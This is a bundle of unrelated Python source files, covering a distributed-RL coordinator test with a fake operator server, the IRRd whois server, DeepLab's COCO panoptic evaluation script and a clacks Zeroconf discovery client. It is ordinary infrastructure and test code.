help="Tolerance to the target pose locations. Higher is easier.",
type=float,
default=0.8,
)
args = parser.parse_args()
if args.cpu:
inference.use_cpu_only()
else:
inference.disable_gpu_preallocation()
# Run until stopped.
live_demo = LiveDemo(
camera=args.camera,
target_poses_path=args.target_poses,
rel_target_radius=args.tolerance,
)
live_demo.run()
|
test_fake_operator_server.py
|
import pytest
import os
import copy
import time
from threading import Thread
import json
from queue import Queue
from flask import Flask, request
from ding.worker import Coordinator
from ding.worker.learner.comm import NaiveLearner
from ding.worker.collector.comm import NaiveCollector
from ding.utils import find_free_port
from ding.config import compile_config_parallel
from ding.config.utils import parallel_test_main_config, parallel_test_create_config, parallel_test_system_config
DATA_PREFIX = 'SLAVE_COLLECTOR_DATA_FAKE_OPERATOR_TEST'
init_replicas_request = {
"collectors": {
"cpu": "0.5",
"memory": "200Mi",
"replicas": 2,
},
"learners": {
"cpu": "0.5",
"memory": "200Mi",
"gpu": "0",
"replicas": 1,
},
}
api_version = 'v1alpha1'
system_addr = 'https://0.0.0.0:14502'
def create_app(creator):
app = Flask(__name__)
@app.route('/{}/replicas'.format(api_version), methods=['POST'])
def post_replicas():
data = json.loads(request.data.decode())
collectors = data['collectors']["replicas"]
learners = data['learners']["replicas"]
creator.set_target_source(learners, collectors)
return {'success': True, 'code': 0, 'message': '', 'data': ''}
@app.route('/{}/replicas'.format(api_version), methods=['GET'])
def get_replicas():
data = json.loads(request.data.decode())
return {'success': True, 'code': 0, 'message': '', 'data': creator.current_resource}
return app
@pytest.fixture(scope='function')
def setup_config():
cfg = compile_config_parallel(
parallel_test_main_config, create_cfg=parallel_test_create_config, system_cfg=parallel_test_system_config
)
cfg.system.coordinator.operator_server = dict(
system_addr=system_addr,
api_version=api_version,
init_replicas_request=init_replicas_request,
collector_target_num=len(cfg.system.coordinator.collector),
learner_target_num=len(cfg.system.coordinator.learner),
)
return cfg
class Creator:
def __init__(self, learner_addr, collector_addr):
self.learner_addr = learner_addr
self.collector_addr = collector_addr
self.collector_demand = Queue()
self.learner_demand = Queue()
self.learners = {}
self.collectors = {}
self.end_flag = False
def set_target_source(self, learner_target, collector_target):
print('set_target_source', learner_target, collector_target)
time.sleep(3) # simulate
self.collector_demand.put(collector_target)
self.learner_demand.put(learner_target)
def start(self):
while not self.end_flag:
if self.learner_demand.empty() and self.collector_demand.empty():
time.sleep(0.1)
continue
else:
learner_demand, collector_demand = None, None
if not self.learner_demand.empty():
learner_demand = self.learner_demand.get()
if not self.collector_demand.empty():
collector_demand = self.collector_demand.get()
for i in range(collector_demand):
name, host, port = self.collector_addr[i]
self.collectors[name] = NaiveCollector(host, port, prefix=DATA_PREFIX)
self.collectors[name].start()
for i in range(learner_demand):
name, host, port = self.learner_addr[i]
self.learners[name] = NaiveLearner(host, port, prefix=DATA_PREFIX)
self.learners[name].start()
def close(self):
self.end_flag = True
time.sleep(1)
for t in self.learners.values():
t.close()
for t in self.collectors.values():
t.close()
@property
def current_resource(self):
collectors = {k: {} for k in self.collectors}
learners = {k: {} for k in self.learners}
return {"collectors": collectors, 'learners': learners}
@pytest.fixture(scope='function')
def setup_operator_server(setup_config):
host, port = system_addr.split("https://")[1].split(":")
port = int(port)
learner_addr = copy.deepcopy(setup_config.system.coordinator.learner)
learner_addr = list(learner_addr.values())
for i in range(len(learner_addr)):
learner_addr[i][0] = '{}:{}'.format(learner_addr[i][1], learner_addr[i][2])
collector_addr = copy.deepcopy(setup_config.system.coordinator.collector)
collector_addr = list(collector_addr.values())
for i in range(len(collector_addr)):
collector_addr[i][0] = '{}:{}'.format(collector_addr[i][1], collector_addr[i][2])
print(learner_addr, collector_addr)
creator = Creator(learner_addr, collector_addr)
creator_start_thread = Thread(target=creator.start, args=(), daemon=True)
creator_start_thread.start()
app = create_app(creator)
app_run_thread = Thread(target=app.run, args=(host, port), daemon=True)
app_run_thread.start()
yield app
creator.close()
print('end')
@pytest.mark.unittest
class TestCoordinatorFakeOperator:
def test_naive(self, setup_config, setup_operator_server):
os.popen('rm -rf {}*'.format(DATA_PREFIX))
# learner/collector is created by operator-server
setup_config.system.coordinator.learner = {}
setup_config.system.coordinator.collector = {}
try:
coordinator = Coordinator(setup_config)
coordinator.start()
while True:
if coordinator._commander._learner_task_finish_count == 1:
break
time.sleep(0.5)
coordinator.close()
except Exception as e:
os.popen('rm -rf {}*'.format(DATA_PREFIX))
assert False, e
collector_task_ids = [t for t in coordinator._historical_task if 'collector' in t]
for i in range(1, 21):
for t in collector_task_ids:
assert os.path.exists('{}_{}_{}'.format(DATA_PREFIX, t, i))
assert os.path.exists('{}_final_model.pth'.format(DATA_PREFIX))
assert len(coordinator._replay_buffer) == 0
learner_task_ids = [i for i in coordinator._historical_task if 'learner' in i]
for i in learner_task_ids:
assert len(coordinator._commander._learner_info[i]) == 5
os.popen('rm -rf {}*'.format(DATA_PREFIX))
|
test.py
|
from threading import Thread
import time
from _actual_aside import AsidePrint
aside = AsidePrint()
aside.run()
for x in range(10):
aside.append(x)
def threaded_adder(num):
global aside
for x in range(10):
aside.append(f"Adder {num} added {x}")
time.sleep(0.5)
adders = []
for x in range(5):
adder = Thread(target=threaded_adder, args=(x, ))
adders.append(adder)
for a in adders:
a.start()
aside.append('Done')
|
server.py
|
import logging
import multiprocessing as mp
import os
import signal
import socket
import socketserver
import threading
import time
from IPy import IP
from daemon.daemon import change_process_owner
from setproctitle import setproctitle
from irrd import ENV_MAIN_PROCESS_PID
from irrd.conf import get_setting
from irrd.server.access_check import is_client_permitted
from irrd.server.whois.query_parser import WhoisQueryParser
from irrd.storage.database_handler import DatabaseHandler
from irrd.storage.preload import Preloader
from irrd.utils.process_support import memory_trim
logger = logging.getLogger(__name__)
mp.allow_connection_pickling()
# Covered by integration tests
def start_whois_server(uid, gid): # pragma: no cover
"""
Start the whois server, listening forever.
This function does not return, except after SIGTERM is received.
"""
setproctitle('irrd-whois-server-listener')
address = (get_setting('server.whois.interface'), get_setting('server.whois.port'))
logger.info(f'Starting whois server on TCP {address}')
server = WhoisTCPServer(
server_address=address,
uid=uid,
gid=gid,
)
# When this process receives SIGTERM, shut down the server cleanly.
def sigterm_handler(signum, frame):
nonlocal server
def shutdown(server):
logging.info('Whois server shutting down')
server.shutdown()
server.server_close()
# Shutdown must be called from a thread to prevent blocking.
threading.Thread(target=shutdown, args=(server,)).start()
signal.signal(signal.SIGTERM, sigterm_handler)
server.serve_forever()
class WhoisTCPServer(socketserver.TCPServer): # pragma: no cover
"""
Server for whois queries.
Starts a number of worker processes that handle the client connections.
Whenever a client is connected, the connection is pushed onto a queue,
from which a worker picks it up. The workers are responsible for the
connection from then on.
"""
allow_reuse_address = True
request_queue_size = 50
def __init__(self, server_address, uid, gid, bind_and_activate=True): # noqa: N803
self.address_family = socket.AF_INET6 if IP(server_address[0]).version() == 6 else socket.AF_INET
super().__init__(server_address, None, bind_and_activate)
if uid and gid:
change_process_owner(uid=uid, gid=gid, initgroups=True)
self.connection_queue = mp.Queue()
self.workers = []
for i in range(int(get_setting('server.whois.max_connections'))):
worker = WhoisWorker(self.connection_queue)
worker.start()
self.workers.append(worker)
def process_request(self, request, client_address):
"""Push the client connection onto the queue for further handling."""
self.connection_queue.put((request, client_address))
def handle_error(self, request, client_address):
logger.error(f'Error while handling request from {client_address}', exc_info=True)
def shutdown(self):
"""
Shut down the server, by killing all child processes,
and then deferring to built-in TCPServer shutdown.
"""
for worker in self.workers:
try:
worker.terminate()
worker.join()
except Exception: # pragma: no cover
pass
return super().shutdown()
class WhoisWorker(mp.Process, socketserver.StreamRequestHandler):
"""
A whois worker is a process that handles whois client connections,
which are retrieved from a queue. After handling a connection,
the process waits for the next connection from the queue.
"""
def __init__(self, connection_queue, *args, **kwargs):
self.connection_queue = connection_queue
# Note that StreamRequestHandler.__init__ is not called - the
# input for that is not available, as it's retrieved from the queue.
super().__init__(*args, **kwargs)
def run(self, keep_running=True) -> None:
"""
Whois worker run loop.
This method does not return, except if it failed to initialise a preloader,
or if keep_running is False, after the first request is handled. The latter
is used in the tests.
"""
# Disable the special sigterm_handler defined in start_whois_server()
# (signal handlers are inherited)
signal.signal(signal.SIGTERM, signal.SIG_DFL)
try:
self.preloader = Preloader()
self.database_handler = DatabaseHandler(readonly=True)
except Exception as e:
logger.critical(f'Whois worker failed to initialise preloader or database, '
f'unable to start, terminating IRRd, traceback follows: {e}',
exc_info=e)
main_pid = os.getenv(ENV_MAIN_PROCESS_PID)
if main_pid: # pragma: no cover
os.kill(int(main_pid), signal.SIGTERM)
else:
logger.error('Failed to terminate IRRd, unable to find main process PID')
return
while True:
try:
setproctitle('irrd-whois-worker')
self.request, self.client_address = self.connection_queue.get()
self.setup()
self.handle_connection()
self.finish()
self.close_request()
memory_trim()
except Exception as e:
try:
self.close_request()
except Exception: # pragma: no cover
pass
logger.error(f'Failed to handle whois connection, traceback follows: {e}',
exc_info=e)
if not keep_running:
break
def close_request(self):
# Close the connection in a similar way normally done by TCPServer
try:
# Try to set the timeout of the shutdown call (#607)
self.request.settimeout(5)
except OSError: # pragma: no cover
pass
try:
# explicitly shutdown. socket.close() merely releases
# the socket and waits for GC to perform the actual close.
self.request.shutdown(socket.SHUT_RDWR)
except OSError: # pragma: no cover
pass # some platforms may raise ENOTCONN here
self.request.close()
def handle_connection(self):
"""
Handle an individual whois client connection.
When this method returns, the connection is closed.
"""
client_ip = self.client_address[0]
self.client_str = client_ip + ':' + str(self.client_address[1])
setproctitle(f'irrd-whois-worker-{self.client_str}')
if not self.is_client_permitted(client_ip):
self.wfile.write(b'%% Access denied')
return
self.query_parser = WhoisQueryParser(client_ip, self.client_str, self.preloader,
self.database_handler)
data = True
while data:
timer = threading.Timer(self.query_parser.timeout, self.close_request)
timer.start()
data = self.rfile.readline()
timer.cancel()
query = data.decode('utf-8', errors='backslashreplace').strip()
if not query:
continue
logger.debug(f'{self.client_str}: processing query: {query}')
if not self.handle_query(query):
return
def handle_query(self, query: str) -> bool:
"""
Handle an individual query.
Returns False when the connection should be closed,
True when more queries should be read.
"""
start_time = time.perf_counter()
if query.upper() == '!Q':
logger.debug(f'{self.client_str}: closed connection per request')
return False
response = self.query_parser.handle_query(query)
response_bytes = response.generate_response().encode('utf-8')
try:
self.wfile.write(response_bytes)
except OSError:
return False
elapsed = time.perf_counter() - start_time
logger.info(f'{self.client_str}: sent answer to query, elapsed {elapsed:.9f}s, '
f'{len(response_bytes)} bytes: {query}')
if not self.query_parser.multiple_command_mode:
logger.debug(f'{self.client_str}: auto-closed connection')
return False
return True
def is_client_permitted(self, ip: str) -> bool:
"""
Check whether a client is permitted.
"""
return is_client_permitted(ip, 'server.whois.access_list', default_deny=False)
|
eval_coco_format.py
|
# Copyright 2019 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Computes evaluation metrics on groundtruth and predictions in COCO format.
The Common Objects in Context (COCO) dataset defines a format for specifying
combined semantic and instance segmentations as "panoptic" segmentations. This
is done with the combination of JSON and image files as specified at:
http://cocodataset.org/#format-results
where the JSON file specifies the overall structure of the result,
including the categories for each annotation, and the images specify the image
region for each annotation in that image by its ID.
This script computes additional metrics such as Parsing Covering on datasets and
predictions in this format. An implementation of Panoptic Quality is also
provided for convenience.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import multiprocessing
import os
import collections
import numpy as np
import six
import utils as panopticapi_utils
from PIL import Image
from absl import app
from absl import flags
from absl import logging
from deeplab.evaluation import panoptic_quality
from deeplab.evaluation import parsing_covering
FLAGS = flags.FLAGS
flags.DEFINE_string(
'gt_json_file', None,
'Path to a JSON file giving ground-truth annotations in COCO format.')
flags.DEFINE_string('pred_json_file', None,
'Path to a JSON file for the predictions to evaluate.')
flags.DEFINE_string(
'gt_folder', None,
'Folder containing panoptic-format ID images to match ground-truth '
'annotations to image regions.')
flags.DEFINE_string('pred_folder', None,
'Folder containing ID images for predictions.')
flags.DEFINE_enum(
'metric', 'pq', ['pq', 'pc'], 'Shorthand name of a metric to compute. '
'Supported values are:\n'
'Panoptic Quality (pq)\n'
'Parsing Covering (pc)')
flags.DEFINE_integer(
'num_categories', 201,
'The number of segmentation categories (or "classes") in the dataset.')
flags.DEFINE_integer(
'ignored_label', 0,
'A category id that is ignored in evaluation, e.g. the void label as '
'defined in COCO panoptic segmentation dataset.')
flags.DEFINE_integer(
'max_instances_per_category', 256,
'The maximum number of instances for each category. Used in ensuring '
'unique instance labels.')
flags.DEFINE_integer('intersection_offset', None,
'The maximum number of unique labels.')
flags.DEFINE_bool(
'normalize_by_image_size', True,
'Whether to normalize groundtruth instance region areas by image size. If '
'True, groundtruth instance areas and weighted IoUs will be divided by the '
'size of the corresponding image before accumulated across the dataset. '
'Only used for Parsing Covering (pc) evaluation.')
flags.DEFINE_integer(
'num_workers', 0, 'If set to a positive number, will spawn child processes '
'to compute parts of the metric in parallel by splitting '
'the images between the workers. If set to -1, will use '
'the value of multiprocessing.cpu_count().')
flags.DEFINE_integer('print_digits', 3,
'Number of significant digits to print in metrics.')
def _build_metric(metric,
num_categories,
ignored_label,
max_instances_per_category,
intersection_offset=None,
normalize_by_image_size=True):
"""Creates a metric aggregator objet of the given name."""
if metric == 'pq':
logging.warning('One should check Panoptic Quality results against the '
'official COCO API code. Small numerical differences '
'(< 0.1%) can be magnified by rounding.')
return panoptic_quality.PanopticQuality(num_categories, ignored_label,
max_instances_per_category,
intersection_offset)
elif metric == 'pc':
return parsing_covering.ParsingCovering(
num_categories, ignored_label, max_instances_per_category,
intersection_offset, normalize_by_image_size)
else:
raise ValueError('No implementation for metric "%s"' % metric)
def _matched_annotations(gt_json, pred_json):
"""Yields a set of (groundtruth, prediction) image annotation pairs.."""
image_id_to_pred_ann = {
annotation['image_id']: annotation
for annotation in pred_json['annotations']
}
for gt_ann in gt_json['annotations']:
image_id = gt_ann['image_id']
pred_ann = image_id_to_pred_ann[image_id]
yield gt_ann, pred_ann
def _open_panoptic_id_image(image_path):
"""Loads a COCO-format panoptic ID image from file."""
return panopticapi_utils.rgb2id(
np.array(Image.open(image_path), dtype=np.uint32))
def _split_panoptic(ann_json, id_array, ignored_label, allow_crowds):
"""Given the COCO JSON and ID map, splits into categories and instances."""
category = np.zeros(id_array.shape, np.uint16)
instance = np.zeros(id_array.shape, np.uint16)
next_instance_id = collections.defaultdict(int)
# Skip instance label 0 for ignored label. That is reserved for void.
next_instance_id[ignored_label] = 1
for segment_info in ann_json['segments_info']:
if allow_crowds and segment_info['iscrowd']:
category_id = ignored_label
else:
category_id = segment_info['category_id']
mask = np.equal(id_array, segment_info['id'])
category[mask] = category_id
instance[mask] = next_instance_id[category_id]
next_instance_id[category_id] += 1
return category, instance
def _category_and_instance_from_annotation(ann_json, folder, ignored_label,
allow_crowds):
"""Given the COCO JSON annotations, finds maps of categories and instances."""
panoptic_id_image = _open_panoptic_id_image(
os.path.join(folder, ann_json['file_name']))
return _split_panoptic(ann_json, panoptic_id_image, ignored_label,
allow_crowds)
def _compute_metric(metric_aggregator, gt_folder, pred_folder,
annotation_pairs):
"""Iterates over matched annotation pairs and computes a metric over them."""
for gt_ann, pred_ann in annotation_pairs:
# We only expect "iscrowd" to appear in the ground-truth, and not in model
# output. In predicted JSON it is simply ignored, as done in official code.
gt_category, gt_instance = _category_and_instance_from_annotation(
gt_ann, gt_folder, metric_aggregator.ignored_label, True)
pred_category, pred_instance = _category_and_instance_from_annotation(
pred_ann, pred_folder, metric_aggregator.ignored_label, False)
metric_aggregator.compare_and_accumulate(gt_category, gt_instance,
pred_category, pred_instance)
return metric_aggregator
def _iterate_work_queue(work_queue):
"""Creates an iterable that retrieves items from a queue until one is None."""
task = work_queue.get(block=True)
while task is not None:
yield task
task = work_queue.get(block=True)
def _run_metrics_worker(metric_aggregator, gt_folder, pred_folder, work_queue,
result_queue):
result = _compute_metric(metric_aggregator, gt_folder, pred_folder,
_iterate_work_queue(work_queue))
result_queue.put(result, block=True)
def _is_thing_array(categories_json, ignored_label):
"""is_thing[category_id] is a bool on if category is "thing" or "stuff"."""
is_thing_dict = {}
for category_json in categories_json:
is_thing_dict[category_json['id']] = bool(category_json['isthing'])
# Check our assumption that the category ids are consecutive.
# Usually metrics should be able to handle this case, but adding a warning
# here.
max_category_id = max(six.iterkeys(is_thing_dict))
if len(is_thing_dict) != max_category_id + 1:
seen_ids = six.viewkeys(is_thing_dict)
all_ids = set(six.moves.range(max_category_id + 1))
unseen_ids = all_ids.difference(seen_ids)
if unseen_ids != {ignored_label}:
logging.warning(
'Nonconsecutive category ids or no category JSON specified for ids: '
'%s', unseen_ids)
is_thing_array = np.zeros(max_category_id + 1)
for category_id, is_thing in six.iteritems(is_thing_dict):
is_thing_array[category_id] = is_thing
return is_thing_array
def eval_coco_format(gt_json_file,
pred_json_file,
gt_folder=None,
pred_folder=None,
metric='pq',
num_categories=201,
ignored_label=0,
max_instances_per_category=256,
intersection_offset=None,
normalize_by_image_size=True,
num_workers=0,
print_digits=3):
"""Top-level code to compute metrics on a COCO-format result.
Note that the default values are set for COCO panoptic segmentation dataset,
and thus the users may want to change it for their own dataset evaluation.
Args:
gt_json_file: Path to a JSON file giving ground-truth annotations in COCO
format.
pred_json_file: Path to a JSON file for the predictions to evaluate.
gt_folder: Folder containing panoptic-format ID images to match ground-truth
annotations to image regions.
pred_folder: Folder containing ID images for predictions.
metric: Name of a metric to compute.
num_categories: The number of segmentation categories (or "classes") in the
dataset.
ignored_label: A category id that is ignored in evaluation, e.g. the "void"
label as defined in the COCO panoptic segmentation dataset.
max_instances_per_category: The maximum number of instances for each
category. Used in ensuring unique instance labels.
intersection_offset: The maximum number of unique labels.
normalize_by_image_size: Whether to normalize groundtruth instance region
areas by image size. If True, groundtruth instance areas and weighted IoUs
will be divided by the size of the corresponding image before accumulated
across the dataset. Only used for Parsing Covering (pc) evaluation.
num_workers: If set to a positive number, will spawn child processes to
compute parts of the metric in parallel by splitting the images between
the workers. If set to -1, will use the value of
multiprocessing.cpu_count().
print_digits: Number of significant digits to print in summary of computed
metrics.
Returns:
The computed result of the metric as a float scalar.
"""
with open(gt_json_file, 'r') as gt_json_fo:
gt_json = json.load(gt_json_fo)
with open(pred_json_file, 'r') as pred_json_fo:
pred_json = json.load(pred_json_fo)
if gt_folder is None:
gt_folder = gt_json_file.replace('.json', '')
if pred_folder is None:
pred_folder = pred_json_file.replace('.json', '')
if intersection_offset is None:
intersection_offset = (num_categories + 1) * max_instances_per_category
metric_aggregator = _build_metric(
metric, num_categories, ignored_label, max_instances_per_category,
intersection_offset, normalize_by_image_size)
if num_workers == -1:
logging.info('Attempting to get the CPU count to set # workers.')
num_workers = multiprocessing.cpu_count()
if num_workers > 0:
logging.info('Computing metric in parallel with %d workers.', num_workers)
work_queue = multiprocessing.Queue()
result_queue = multiprocessing.Queue()
workers = []
worker_args = (metric_aggregator, gt_folder, pred_folder, work_queue,
result_queue)
for _ in six.moves.range(num_workers):
workers.append(
multiprocessing.Process(target=_run_metrics_worker, args=worker_args))
for worker in workers:
worker.start()
for ann_pair in _matched_annotations(gt_json, pred_json):
work_queue.put(ann_pair, block=True)
# Will cause each worker to return a result and terminate upon receiving a
# None task.
for _ in six.moves.range(num_workers):
work_queue.put(None, block=True)
# Retrieve results.
for _ in six.moves.range(num_workers):
metric_aggregator.merge(result_queue.get(block=True))
for worker in workers:
worker.join()
else:
logging.info('Computing metric in a single process.')
annotation_pairs = _matched_annotations(gt_json, pred_json)
_compute_metric(metric_aggregator, gt_folder, pred_folder, annotation_pairs)
is_thing = _is_thing_array(gt_json['categories'], ignored_label)
metric_aggregator.print_detailed_results(
is_thing=is_thing, print_digits=print_digits)
return metric_aggregator.detailed_results(is_thing=is_thing)
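# Usage sketch: calling the evaluation directly from Python instead of via the
# flags below. Paths are placeholders.
#
#   results = eval_coco_format(
#       gt_json_file='annotations/panoptic_val.json',
#       pred_json_file='predictions/panoptic_pred.json',
#       metric='pc',        # Parsing Covering; use 'pq' for Panoptic Quality
#       num_workers=-1)     # parallelize across all CPU cores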
def main(argv):
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
eval_coco_format(FLAGS.gt_json_file, FLAGS.pred_json_file, FLAGS.gt_folder,
FLAGS.pred_folder, FLAGS.metric, FLAGS.num_categories,
FLAGS.ignored_label, FLAGS.max_instances_per_category,
FLAGS.intersection_offset, FLAGS.normalize_by_image_size,
FLAGS.num_workers, FLAGS.print_digits)
if __name__ == '__main__':
flags.mark_flags_as_required(
['gt_json_file', 'gt_folder', 'pred_json_file', 'pred_folder'])
app.run(main)
|
zeroconf_client.py
|
# This file is part of the clacks framework.
#
# http://clacks-project.org
#
# Copyright:
# (C) 2010-2012 GONICUS GmbH, Germany, http://www.gonicus.de
#
# License:
# GPL-2: http://www.gnu.org/licenses/gpl-2.0.html
#
# See the LICENSE file in the project's top-level directory for details.
import re
import select
import platform
import shlex
import subprocess
from threading import Thread
from Queue import Queue
if platform.system() != "Windows":
from clacks.common.components.dbus_runner import DBusRunner
import dbus
import avahi
else:
import pybonjour #@UnresolvedImport
class ZeroconfException(Exception):
pass
class ZeroconfClient(object):
"""
The ZeroconfClient class helps with browsing for announced services. It
creates a separate thread and needs the registered service to look for
as a parameter.
Usage example::
>>> import time
>>> import ZeroconfClient
>>>
>>> # This is the function called on changes
>>> def callback(sdRef, flags, interfaceIndex, errorCode, fullname,
... hosttarget, port, txtRecord):
... print('Resolved service:')
... print(' fullname =', fullname)
... print(' hosttarget =', hosttarget)
... print(' TXT =', txtRecord)
... print(' port =', port)
>>>
>>> # Get instance and tell client to start
>>> z= ZeroconfClient(['_amqps._tcp'], callback=callback)
>>> z.start()
>>>
>>> # Do some sleep until someone presses Ctrl+C
>>> try:
>>> while True:
>>> time.sleep(1)
>>> except KeyboardInterrupt:
>>> # Shutdown client
>>> z.stop()
>>> exit()
=============== ============
Parameter Description
=============== ============
regtypes The service list to watch out for - i.e. _amqps._tcp
timeout The timeout in seconds
callback Method to call when we've received something
domain optional DNS domain to discover
direct Do not use python DBUS, but the avahi-browse binary
=============== ============
"""
__resolved = []
__services = {}
oneshot = False
def __init__(self, regtypes, timeout=2.0, callback=None, domain='local',
direct=False):
self.__timeout = timeout
self.__callback = callback
self.__regtypes = regtypes
self.__domain = domain
self.__server = None
self.__thread = None
self.__runner = None
self.active = False
if platform.system() != "Windows":
if direct:
self.start = self.startDirect
self.stop = self.stopDirect
else:
self.start = self.startAvahi
self.stop = self.stopAvahi
else:
self.start = self.startPybonjour
self.stop = self.stopPybonjour
def __get_path(self, txt):
l = avahi.txt_array_to_string_array(txt)
for k in l:
if k[:5] == "path=":
if k[5:].startswith("/"):
return k[5:]
else:
return "/" + k[5:]
return "/"
def __get_service(self, txt):
l = avahi.txt_array_to_string_array(txt)
for k in l:
if k[:8] == "service=":
return k[8:]
return None
@staticmethod
def discover(regs, domain=None, direct=False):
q = Queue()
def done_callback(services):
q.put(services)
mdns = ZeroconfClient(regs, callback=done_callback, direct=direct)
mdns.start()
if domain:
sddns = ZeroconfClient(regs, callback=done_callback, domain=domain,
direct=direct)
sddns.start()
while True:
urls = q.get()
q.task_done()
if urls:
break
if domain:
sddns.stop()
mdns.stop()
return urls
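# Usage sketch: the blocking discover() helper wraps the callback machinery
# shown in the class docstring and returns the resolved service URLs (clacks
# services only). The URL below is a placeholder.
#
#   >>> ZeroconfClient.discover(['_amqps._tcp'])
#   ['amqps://amqp.example.net:5671/']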
def startDirect(self):
self.active = True
def runner():
services = None
while self.active:
# Find local services
services = self.__direct_start("avahi-browse -atkpr")
# If there are none, check global services
if not services:
services = self.__direct_start("avahi-browse -atkpr -d %s" % self.domain)
self.__callback([] if not services else services)
self.__thread = Thread(target=runner)
self.__thread.start()
def __direct_start(self, cmd):
service = []
args = shlex.split(cmd)
output, error = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
if error:
return []
for line in output.split('\n'):
if line.startswith("="):
flag, device, wproto, dsc, proto, loc, address, ip, port, txt = line.split(";") #@UnusedVariable
txt = re.findall(r'"([^"]+)"', txt)
if txt:
info = dict([v.split("=")[0:2] for v in txt])
if 'service' in info and info['service'] == 'clacks':
service.append("%s://%s:%s%s" % (proto.split(".")[0][1:], address, port, info['path'] if info['path'].startswith("/") else "/" + info["path"]))
return list(set(service))
def stopDirect(self):
self.active = False
self.__thread.join()
def startAvahi(self):
self.__runner = DBusRunner.get_instance()
bus = self.__runner.get_system_bus()
bus.add_signal_receiver(self.__dbus_connect, "NameOwnerChanged", "org.freedesktop.DBus", arg0="org.freedesktop.Avahi")
self.__avahi_start()
def __avahi_start(self):
bus = self.__runner.get_system_bus()
self.__server = dbus.Interface(
bus.get_object(avahi.DBUS_NAME, avahi.DBUS_PATH_SERVER),
avahi.DBUS_INTERFACE_SERVER)
# Register for all types we're interested in
for reg_type in self.__regtypes:
self.__registerServiceTypeAvahi(reg_type)
self.__runner.start()
def stopAvahi(self):
self.__runner.stop()
def __dbus_connect(self, a, connect, disconnect):
if connect != "":
self.stopAvahi()
else:
self.__avahi_start()
def __registerServiceTypeAvahi(self, reg_type):
bus = self.__runner.get_system_bus()
sbrowser = dbus.Interface(
bus.get_object(
avahi.DBUS_NAME,
self.__server.ServiceBrowserNew(
avahi.IF_UNSPEC,
avahi.PROTO_INET,
reg_type,
self.__domain,
dbus.UInt32(0))),
avahi.DBUS_INTERFACE_SERVICE_BROWSER)
sbrowser.connect_to_signal("ItemNew", self.__newServiceAvahi)
sbrowser.connect_to_signal("ItemRemove", self.__removeServiceAvahi)
#sbrowser.connect_to_signal("AllForNow", self.__allForNowAvahi)
#sbrowser.connect_to_signal("Failure", self.__errorCallbackAvahi)
#pylint: disable=W0613
def __newServiceAvahi(self, interface, protocol, name, stype, domain, flags):
#pylint: disable=W0612
self.__server.ResolveService(interface, protocol, name, stype, domain, avahi.PROTO_INET, dbus.UInt32(0), reply_handler=self.__service_resolved, error_handler=self.__print_error)
def __print_error(self, err):
try:
from clacks.common import Environment
env = Environment.getInstance()
env.log.error(err)
except:
pass
def __service_resolved(self, interface, protocol, name, stype, domain, host, aprotocol, address, port, txt, flags):
# Conversion to URL
if port == 80:
port = ''
else:
port = ':%i' % port
if self.__get_service(txt) == "clacks":
path = self.__get_path(txt)
url = "%s://%s%s%s" % (stype[1:].split(".")[0], host, port, path)
self.__services[(interface, protocol, name, stype, domain)] = url.encode('ascii')
self.__callback(self.__services.values())
def __removeServiceAvahi(self, interface, protocol, name, stype, domain):
del self.__services[(interface, protocol, name, stype, domain)]
def __allForNowAvahi(self):
self.__callback(self.__services.values())
def __errorCallbackAvahi(self, *args):
raise ZeroconfException("DBUS communication error: %s" % str(args[0]))
def startPybonjour(self):
self.active = True
browse_sdRefs = []
# Start the bonjour event processing.
for reg_type in self.__regtypes:
    browse_sdRefs.append(pybonjour.DNSServiceBrowse(regtype=reg_type,
                                                    callBack=self.__browseCallback))
def runner():
    try:
        while self.active:
            ready = select.select(browse_sdRefs, [], [],
                                  self.__timeout)
            for browse_sdRef in browse_sdRefs:
                if browse_sdRef in ready[0]:
                    pybonjour.DNSServiceProcessResult(browse_sdRef)
    finally:
        # Close every browse reference, not just the last one processed.
        for browse_sdRef in browse_sdRefs:
            browse_sdRef.close()
self.__thread = Thread(target=runner)
self.__thread.start()
def stopPybonjour(self):
self.active = False
self.__thread.join()
def __resolveCallback(self, sdRef, flags, interfaceIndex, errorCode,
fullname, host, port, txt):
if errorCode == pybonjour.kDNSServiceErr_NoError:
# Conversion to URL
if port == 80:
port = ''
else:
port = ':%i' % port
if self.__get_service(txt) == "clacks":
path = self.__get_path(txt)
url = "%s://%s%s%s" % (fullname.split(".")[-4:-3][0][1:], host, port, path)
self.__callback([url.encode('ascii')])
self.__resolved.append(True)
def __browseCallback(self, sdRef, flags, interfaceIndex, errorCode,
serviceName, regtype, replyDomain):
if errorCode != pybonjour.kDNSServiceErr_NoError:
return
# Service removed
if not (flags & pybonjour.kDNSServiceFlagsAdd):
return
# Service added
resolve_sdRef = pybonjour.DNSServiceResolve(0,
interfaceIndex,
serviceName,
regtype,
replyDomain,
self.__resolveCallback)
try:
while not self.__resolved:
    ready = select.select([resolve_sdRef], [], [], self.__timeout)
    if resolve_sdRef not in ready[0]:
        # Resolve timed out; give up on this service.
        break
    pybonjour.DNSServiceProcessResult(resolve_sdRef)
else:
    self.__resolved.pop()
finally:
resolve_sdRef.close()
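# Illustrative sketch (not part of the original module): how the blocking
# ZeroconfClient.discover() helper above might be used to look up service URLs.
# The registration type and domain below are assumptions made for the example.
def _example_discover_service_urls():
    # Blocks until mDNS (or the given DNS domain) reports at least one URL.
    urls = ZeroconfClient.discover(['_amqps._tcp'], domain='example.net')
    for url in urls:
        print(url)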
|
scheduling_manager.py
|
import os
import time
import logging
import threading
from xml.etree import ElementTree
from galaxy import model
from galaxy.util import plugin_config
import galaxy.workflow.schedulers
log = logging.getLogger( __name__ )
DEFAULT_SCHEDULER_ID = "default" # well actually this should be called DEFAULT_DEFAULT_SCHEDULER_ID...
DEFAULT_SCHEDULER_PLUGIN_TYPE = "core"
EXCEPTION_MESSAGE_SHUTDOWN = "Exception raised while attempting to shutdown workflow scheduler."
EXCEPTION_MESSAGE_NO_SCHEDULERS = "Failed to define workflow schedulers - no workflow schedulers defined."
